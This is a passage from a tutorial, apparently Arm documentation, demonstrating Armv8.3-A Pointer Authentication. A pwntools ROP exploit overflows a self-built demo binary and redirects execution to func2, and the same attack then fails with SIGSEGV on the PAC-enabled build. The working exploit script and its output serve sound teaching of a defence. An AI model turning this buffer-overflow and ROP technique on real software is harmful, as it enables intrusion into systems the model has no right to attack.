Install pwntools and its dependencies. You will use this exploit development library to demonstrate how you can exploit the application built in the previous section without pointer authentication.
sudo apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev -y
python3 -m pip install --upgrade pip
python3 -m pip install --upgrade pwntools
Create exploit.py with the following to attack the main_nopac application, and cause func2() to be executed.
#!/usr/bin/env python3
from pwn import *
context(os='linux', arch='aarch64')
binary = ELF('./main_nopac')
rop = ROP(binary)
padding = b'A' * 24
rop.call(binary.symbols['func2']) # return to func2
print(rop.gadgets)
log.info("ROP chain:\n" + rop.dump())
print(rop.chain())
data = padding + rop.chain()
print(data)
data = data.replace(b'\0',b'')
print(data)
r = process(['./main_nopac', data])
r.interactive()
If necessary, make the script executable.
chmod +x ./exploit.py
Run the script which exploits main_nopac:
./exploit.py
Which should result output similar to the following:
[*] '/home/ubuntu/pac/main_nopac'
Arch: aarch64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] Loading gadgets for '/home/ubuntu/pac/main_nopac'
{4194964: Gadget(0x400294, ['ret'], [], 0x8), 4257924: Gadget(0x40f884, ['ret', 'ret'], [], 0x10)}
[*] ROP chain:
0x0000: 0x4006f8 0x4006f8()
b'\xf8\x06@\x00\x00\x00\x00\x00'
b'AAAAAAAAAAAAAAAAAAAAAAAA\xf8\x06@\x00\x00\x00\x00\x00'
b'AAAAAAAAAAAAAAAAAAAAAAAA\xf8\x06@'
[+] Starting local process './main_nopac': pid 4585
[*] Switching to interactive mode
Hello World!
Hello from func2!
$
You have successfully altered execution flow of the program and jumped to address 0x4006f8 (func2).
You will be in an interactive shell prompt whilst still inside the application:
$ ls
Makefile exploit.py main.c main_nopac main_pac
$
Use Ctrl+C to exit the shell, and hence the main_nopac application.
[*] Interrupted
[*] Stopped process './main_nopac' (pid 4618)
Replace the arguments in the script using sed. This saves a new file exploit_pac.py:
sed 's/main_nopac/main_pac/g' exploit.py > exploit_pac.py
chmod +x exploit_pac.py
Now execute exploit_pac.py
./exploit_pac.py
The script attempts the same attack:
[*] '/home/ubuntu/pac/main_pac'
Arch: aarch64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] Loading gadgets for '/home/ubuntu/pac/main_pac'
{4194964: Gadget(0x400294, ['ret'], [], 0x8), 4257988: Gadget(0x40f8c4, ['ret', 'ret'], [], 0x10)}
[*] ROP chain:
0x0000: 0x4006fc 0x4006fc()
b'\xfc\x06@\x00\x00\x00\x00\x00'
b'AAAAAAAAAAAAAAAAAAAAAAAA\xfc\x06@\x00\x00\x00\x00\x00'
b'AAAAAAAAAAAAAAAAAAAAAAAA\xfc\x06@'
[+] Starting local process './main_pac': pid 4605
[*] Switching to interactive mode
Hello World!
[*] Got EOF while reading in interactive
$
When you attempt to use the shell prompt you generate a SIGSEGV exception instead, and the application terminates.
$ ls
[*] Process './main_pac' stopped with exit code -11 (SIGSEGV) (pid 4605)
[*] Got EOF while sending in interactive
This demonstrates how the Armv8.3-A Pointer Authentication feature provides protection against software attacks.